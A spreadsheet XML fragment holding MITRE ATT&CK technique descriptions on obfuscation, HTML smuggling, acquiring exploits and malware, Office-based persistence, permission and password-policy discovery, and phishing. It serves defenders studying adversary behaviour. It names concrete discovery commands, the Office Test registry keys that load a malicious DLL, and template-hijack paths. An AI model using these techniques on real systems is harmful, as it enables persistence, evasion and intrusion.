* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</t>
  </si>
  <si>
    <t>Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) 
Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) 
For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) 
Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)</t>
  </si>
  <si>
    <t>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as &lt;code&gt;text/plain&lt;/code&gt; and/or &lt;code&gt;text/html&lt;/code&gt;. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as &lt;code&gt;msSaveBlob&lt;/code&gt;.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 
By the end of 2017, a threat group used &lt;code&gt;Invoke-PSImage&lt;/code&gt; to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  </t>
  </si>
  <si>
    <t>Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)
Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt; (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. &lt;code&gt;show aaa&lt;/code&gt;, &lt;code&gt;show aaa common-criteria policy all&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; in AWS (Citation: AWS GetPasswordPolicy).</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. 
From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. </t>
  </si>
  <si>
    <t>Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016)
